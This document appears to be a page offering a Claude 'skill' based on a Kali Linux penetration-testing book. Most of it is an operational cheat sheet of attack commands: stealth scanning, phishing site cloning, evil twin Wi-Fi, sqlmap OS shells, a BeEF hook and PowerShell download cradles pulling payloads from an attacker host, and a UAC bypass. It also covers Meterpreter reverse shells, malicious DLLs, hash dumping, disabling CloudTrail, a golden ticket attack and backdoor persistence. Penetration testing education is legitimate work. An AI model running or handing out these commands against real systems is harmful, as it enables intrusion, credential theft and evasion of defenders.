technical see the announcement →
Mastering Kali Linux for Advanced Penetration Testing
Mastering Kali Linux for Advanced Penetration Testing, 4th Edition · ·500 pages
Advanced Kali Linux pentesting guide: OSINT/stealth recon, wireless attacks (WPA2/WPS/Evil Twin), web exploitation (Burp/sqlmap/BeEF), cloud exploitation (AWS IAM/S3), AV evasion (Veil/fileless/UAC bypass), Metasploit, lateral movement (CrackMapExec/ProxyChains), privilege escalation, and Kerberos golden ticket attack.
Capabilities (7)
- › Execute stealth scanning: decoys, packet fragmentation, source port manipulation, proxychains
- › Perform OSINT recon: Maltego, SpiderFoot, theHarvester, Google dorks, CeWL wordlists
- › Conduct wireless attacks: WPA2 handshake capture/crack, WPS Pixie-Dust, Evil Twin with Wifiphisher
- › Exploit web apps: Burp Suite workflow, sqlmap with WAF bypass, commix, BeEF browser hook
- › Evade AV: Veil framework, fileless PowerShell download cradle, encoded commands, UAC bypass
- › Perform lateral movement: CrackMapExec, ProxyChains + SOCKS pivot, PsExec, WMIC
- › Execute Kerberos golden ticket attack after compromising krbtgt hash
How to use
Install this skill and Claude can design stealth recon workflows, select and sequence wireless attacks based on target AP configuration, compare AV evasion payload delivery techniques for specific endpoint security stacks, build lateral movement chains with CrackMapExec and ProxyChains, and walk through the Kerberos golden ticket attack chain for authorized assessments
Why it matters
Advanced penetration testing requires technique selection and evasion judgment — not just syntax recall; understanding which attack approach fits a given environment and security stack is what separates effective authorized engagements from noisy ones that trigger defenses before objectives are reached
Example use cases
- › Determining whether to attempt WPS Pixie-Dust via reaver or capture a WPA2 four-way handshake via deauth given a specific access point configuration, then outlining the cracking approach for each path
- › Designing a fileless PowerShell delivery chain for a Windows target with Defender enabled that avoids disk writes and establishes a Meterpreter session over HTTPS
- › Walking through the Kerberos golden ticket attack chain from dcsync krbtgt hash acquisition to full domain persistence that survives a normal account password reset
Mastering Kali Linux Skill
Goal-Based Penetration Testing Methodology
Phase 1: Reconnaissance (passive → active)
Phase 2: Vulnerability Assessment
Phase 3: Exploitation
Phase 4: Post-Exploitation (lateral movement, privilege escalation)
Phase 5: ReportingObjective-based testing: Define specific goals before starting — e.g., “access HR database” or “achieve domain admin” — rather than generic “find all vulns.”
OSINT and Passive Reconnaissance
Domain and Email Enumeration
# Passive DNS recon
whois target.com
dig target.com ANY
dnsrecon -d target.com -t std
# Email harvesting
theHarvester -d target.com -b google,linkedin,bing -l 500
# OSINT frameworks
maltego # visual link analysis of entities
spiderfoot --no-web -s target.com -m all # automated OSINT
# Google Dork examples
site:target.com filetype:pdf
site:target.com inurl:admin
intitle:"index of" site:target.com
"@target.com" filetype:xlsCustom Wordlist Generation
# CeWL: spider website for custom wordlist
cewl -d 3 -m 8 -w custom_wordlist.txt https://target.com
# twofi: extract words from Twitter
twofi -t @target_twitter -u username -w twitter_words.txt
# Combine and deduplicate
cat custom_wordlist.txt twitter_words.txt | sort -u > combined.txtActive Reconnaissance
Stealth Scanning Techniques
# Slow scan to evade IDS
nmap -sS -T2 -p 1-65535 target # SYN scan, paranoid timing
# Decoy scan (hide real IP among decoys)
nmap -D RND:10 target # random decoys
nmap -D decoy1,decoy2,ME target # specific decoys
# Fragmented packets (evade packet inspection)
nmap -f target
# Source port spoofing (bypass firewall rules allowing port 53/80)
nmap --source-port 53 target
# Proxy chains for anonymity
proxychains nmap -sT target # TCP connect through SOCKS proxy
# Combine masscan (speed) + nmap (accuracy)
masscan -p 1-65535 --rate=1000 target -oG masscan.txt
ports=$(cat masscan.txt | awk '/open/ {print $4}' | tr '\n' ',' | sed 's/\/tcp//g')
nmap -sV -sC -p $ports targetInternal Network Enumeration
# ARP discovery (layer 2, fast)
arp-scan -l # local network
nmap -PR 192.168.1.0/24 # ARP ping sweep
# SNMP enumeration (if UDP 161 open)
snmpwalk -c public -v1 target # walk MIB with community string "public"
snmp-check target # enumerate users, interfaces, processes
# SMB enumeration
enum4linux -a target # full Windows/Samba enumeration
smbclient -L //target -N # list shares, no password
crackmapexec smb 192.168.1.0/24 # enumerate entire subnetActive Directory Reconnaissance
# AD enumeration (with credentials)
bloodhound-python -u user -p pass -d corp.local -ns 192.168.1.10 -c All
# Import JSON files into BloodHound GUI
ldapsearch -x -h 192.168.1.10 -b "dc=corp,dc=local" "(objectClass=user)"
# From Windows (after compromise)
powershell Get-ADUser -Filter * -Properties *
powershell Get-ADComputer -Filter * -Properties OperatingSystemVulnerability Assessment
Nmap NSE Scripts
# Vulnerability scan
nmap --script vuln target
nmap --script=smb-vuln* target # all SMB vulnerability checks
nmap --script=http-shellshock target # Shellshock test
# Service-specific scripts
nmap -p 21 --script ftp-anon target # anonymous FTP check
nmap -p 445 --script smb-enum-shares target
nmap -p 3306 --script mysql-empty-password target
# Custom Lua NSE script skeleton
description = [[ Checks for vulnerability X ]]
categories = {"vuln"}
local nmap = require "nmap"
action = function(host, port)
-- test and return result
endWeb Application Scanning
nikto -h https://target.com -ssl # basic web vuln scan
nikto -h target.com -port 8080 -Tuning 4 # XSS focused
# OWASP ZAP headless mode
zaproxy -daemon -config api.key=mykey -port 8090 &
curl "http://localhost:8090/JSON/spider/action/scan/?apikey=mykey&url=http://target.com"OpenVAS Network Scanner
gvm-start # start Greenbone/OpenVAS
# Access web UI at https://localhost:9392
# Create target → create task → run → export reportSocial Engineering
Social Engineering Toolkit (SET)
setoolkit
# 1) Social-Engineering Attacks
# → 2) Website Attack Vectors
# → 3) Credential Harvester Attack Method
# → 2) Site Cloner
# → Enter target URL (e.g., gmail.com login page)
# SET clones site, hosts on attacker, harvests submitted credsPhishing with Gophish
# Configure Gophish server
./gophish # start on :3333 (admin) and :80 (phishing)
# Create:
# 1. Sending profile (SMTP server)
# 2. Email template (HTML, with {{.URL}} tracking link)
# 3. Landing page (capture form submissions)
# 4. User group (target emails from CSV)
# 5. Campaign → launch → monitor open/click/credential ratesPhysical Access Attacks
# Reset Windows password via physical access (Kali boot)
samdump2 /mnt/windows/Windows/System32/config/SYSTEM \
/mnt/windows/Windows/System32/config/SAM > hashes.txt
john --format=NT hashes.txt # crack NTLM hashes
# Change Windows password directly
chntpw -i /mnt/windows/Windows/System32/config/SAM
# Select user → clear password or set new
# Sticky Keys backdoor (before Windows login)
# Replace C:\Windows\System32\sethc.exe with cmd.exe
# Press Shift 5× at login → get SYSTEM shellWireless Attacks
WPA2 Cracking
# Monitor mode
airmon-ng check kill
airmon-ng start wlan0 # creates wlan0mon
# Capture handshake
airodump-ng -c [channel] --bssid [AP_MAC] -w capture wlan0mon
# Deauth a client to force reconnect (and handshake)
aireplay-ng -0 3 -a [AP_MAC] -c [client_MAC] wlan0mon
# Crack WPA2 handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# WPS attack with Reaver
reaver -i wlan0mon -b [AP_MAC] -vv -K 1 # Pixie-Dust attack (fast)
reaver -i wlan0mon -b [AP_MAC] -vv # brute force WPS PINEvil Twin Attack
# Wifiphisher: automated evil twin
wifiphisher -aI wlan0 -eI wlan1 --essid "TargetNetwork" -p wifi-connect
# Deauths clients from real AP, serves captive portal via evil twin
# Victim enters credentials on fake portal → capturedBluetooth Attacks
hcitool scan # discover Bluetooth devices
hcitool info [BT_address] # get device info
l2ping -c 10 [BT_address] # ping test
sdptool browse [BT_address] # service discoveryWeb Application Exploitation
Burp Suite Workflow
1. Set browser to proxy localhost:8080
2. Intercept requests → modify headers, parameters, cookies
3. Spider → discover all endpoints
4. Scanner → auto-detect vulnerabilities
5. Intruder → fuzz:
- Sniper: single parameter with payload list
- Cluster bomb: multiple parameters, all combinations
6. Repeater → manually test specific requests
7. Extender → add Python/Java plugins (CSRF bypass, JWT editor, etc.)SQL Injection with sqlmap
# Basic detection
sqlmap -u "http://target.com/page?id=1" --dbs
# With Burp request file
sqlmap -r request.txt --dbs --level=5 --risk=3
# Dump database
sqlmap -u "http://target.com/page?id=1" -D database -T users --dump
# Get OS shell (if admin DB account)
sqlmap -u "http://target.com/page?id=1" --os-shell
# WAF bypass
sqlmap -u "..." --tamper=space2comment,randomcase,charencodeOS Command Injection (commix)
commix --url="http://target.com/search.php?query=test"
commix --url="http://target.com/" --data="field=test" # POST
commix --url="..." --file-write=/var/www/shell.php --file-dest=/var/www/html/shell.phpBrowser Exploitation Framework (BeEF)
# Start BeEF
beef-xss
# Access panel: http://localhost:3000/ui/panel
# Hook a browser: inject into web page:
<script src="http://attacker:3000/hook.js"></script>
# From hooked browser panel:
# → Social Engineering: fake Flash update → payload delivery
# → Network: internal network scanner from victim's browser
# → Tunneling proxy: route HTTP through victim's browserCloud Security Exploitation
AWS Misconfiguration Testing
# S3 bucket enumeration
aws s3 ls s3://target-bucket --no-sign-request # public bucket check
aws s3 sync s3://target-bucket . --no-sign-request # download all files
# EC2 metadata SSRF
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → Get temporary AWS credentials from role
# Enumerate with stolen credentials
aws configure --profile stolen
aws sts get-caller-identity --profile stolen
aws iam list-users --profile stolen
aws secretsmanager list-secrets --profile stolen
aws s3 ls --profile stolenAWS IAM Privilege Escalation
# Check effective permissions
aws iam simulate-principal-policy \
--policy-source-arn arn:aws:iam::123456789:user/victim \
--action-names iam:CreatePolicyVersion \
--resource-arns "*"
# CloudTrail log obfuscation (after gaining access)
aws cloudtrail stop-logging --name mytrail # disable logging (noisy!)
# Better: don't generate unusual API callsBypassing Security Controls
AV Evasion with Veil Framework
veil
# → use Evasion
# → use python/meterpreter/rev_tcp
# → set LHOST / LPORT
# → generate → saves .py and .exe
# Compiles Python to executable, obfuscates with AES encryptionFileless Attacks
# PowerShell download cradle (runs in memory, never touches disk)
IEX(New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')
# Encoded command (bypass execution policy logging)
$cmd = 'IEX(New-Object Net.WebClient).DownloadString("http://attacker/payload.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
powershell -EncodedCommand $encodedUAC Bypass (Windows 10)
# fodhelper.exe UAC bypass (requires medium integrity, local admin)
# Registry hijack: fodhelper reads HKCU\Software\Classes\ms-settings\Shell\Open\command
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\Windows\System32\cmd.exe" /f
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /f
fodhelper.exe # spawns cmd.exe with high integrity (elevated)Exploitation
Metasploit Workflow
msfconsole
db_nmap -sV -p 1-65535 target # nmap into MSF database
vulns # show detected vulnerabilities
hosts; services # view enumeration data
# Exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
run
# Resource file for multiple targets
echo "use exploit/multi/handler" > auto.rc
echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> auto.rc
echo "set LHOST 192.168.1.10" >> auto.rc
echo "run -j" >> auto.rc
msfconsole -r auto.rcDeveloping Windows Exploits
1. Fuzz: send incrementally larger inputs until crash
2. Replicate crash in Immunity Debugger (note EIP value)
3. Find offset: pattern_create → send → pattern_offset
4. Verify EIP control: send offset A's + BBBB → EIP = 0x42424242
5. Find bad chars: test 0x01-0xff, note which corrupt the payload
6. Find JMP ESP: !mona find -s "\xff\xe4" -m "module.dll" (no ASLR/SafeSEH)
7. Generate shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=... -b "\x00\x0a" -f c
8. Build: offset + JMP ESP + NOP sled + shellcodePost-Exploitation and Lateral Movement
Meterpreter Post-Exploitation
meterpreter> getuid; getsystem # current user, attempt privesc
meterpreter> hashdump # dump NTLM hashes
meterpreter> run post/windows/gather/credentials/credential_collector
meterpreter> run post/multi/recon/local_exploit_suggester
meterpreter> portfwd add -l 3389 -p 3389 -r internal_host # port forward RDP
# Meterpreter pivoting
route add 10.10.10.0/24 [session_id] # route through meterpreter
use auxiliary/scanner/portscan/tcp # now scan internal 10.10.10.xCrackMapExec for Lateral Movement
# Spray credentials across network
crackmapexec smb 192.168.1.0/24 -u admin -p 'Password123'
# PWN3D! means local admin rights
# Execute commands
crackmapexec smb target -u admin -p password -x "whoami"
crackmapexec smb target -u admin -H ntlm_hash --exec-method smbexec -x "cmd"
# Dump hashes
crackmapexec smb target -u admin -p password --sam # SAM hashes
crackmapexec smb target -u admin -p password --lsa # LSA secretsProxyChains Pivoting
# Configure /etc/proxychains.conf:
socks5 127.0.0.1 1080
# Set up SOCKS proxy through Meterpreter
meterpreter> run auxiliary/server/socks_proxy SRVPORT=1080 VERSION=5
# Now access internal network through victim
proxychains nmap -sT internal_target
proxychains ssh user@internal_serverPrivilege Escalation
Windows Privilege Escalation
# Local admin → SYSTEM
meterpreter> getsystem # tries token impersonation, service techniques, etc.
# DLL injection (process missing DLL)
# 1. Find process with missing DLL (via ProcMon: NAME NOT FOUND on DLL)
# 2. Craft malicious DLL: msfvenom -p windows/meterpreter/reverse_tcp ... -f dll -o evil.dll
# 3. Place DLL in writable path in search order
# 4. Trigger process restart → meterpreter session with process privilegesKerberos Golden Ticket Attack
# Requirements: domain admin access, NTLM hash of krbtgt account
# Step 1: Get krbtgt hash (requires DA)
meterpreter> hashdump # or mimikatz
mimikatz> lsadump::dcsync /domain:corp.local /user:krbtgt
# Step 2: Generate golden ticket (valid 10 years)
mimikatz> kerberos::golden /user:Administrator /domain:corp.local \
/sid:S-1-5-21-xxx /krbtgt:[krbtgt_NTLM_hash] /ticket:golden.kirbi
# Step 3: Pass ticket
mimikatz> kerberos::ptt golden.kirbi
mimikatz> exit
klist # verify ticket loaded
# Now access any service in the domain as Administrator
dir \\dc01.corp.local\C$Responder for Credential Capture
responder -I eth0 -wrf
# Poisons LLMNR/NBT-NS → captures NetNTLM hashes
# MiTM LDAP over TLS (LDAP relay)
responder -I eth0 --lm --disable-ess
# Crack NetNTLM hashes
hashcat -m 5600 netntlm.txt rockyou.txtC2 and Persistence
Persistence Techniques (Windows)
# Scheduled task persistence
schtasks /create /sc ONLOGON /tn "Updater" /tr "C:\backdoor.exe" /ru SYSTEM
# Registry run key
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" \
/v "Updater" /t REG_SZ /d "C:\backdoor.exe" /f
# WMI persistence
powershell -c "Register-WmiEvent -Trigger '__InstanceCreationEvent' \
-Query 'SELECT * FROM __InstanceCreationEvent WITHIN 60' \
-Action { Start-Process C:\backdoor.exe }"
# Netcat persistent listener (Linux)
nc -lvnp 4444 &
crontab -e: "* * * * * nc -lvnp 4444" # restart if killed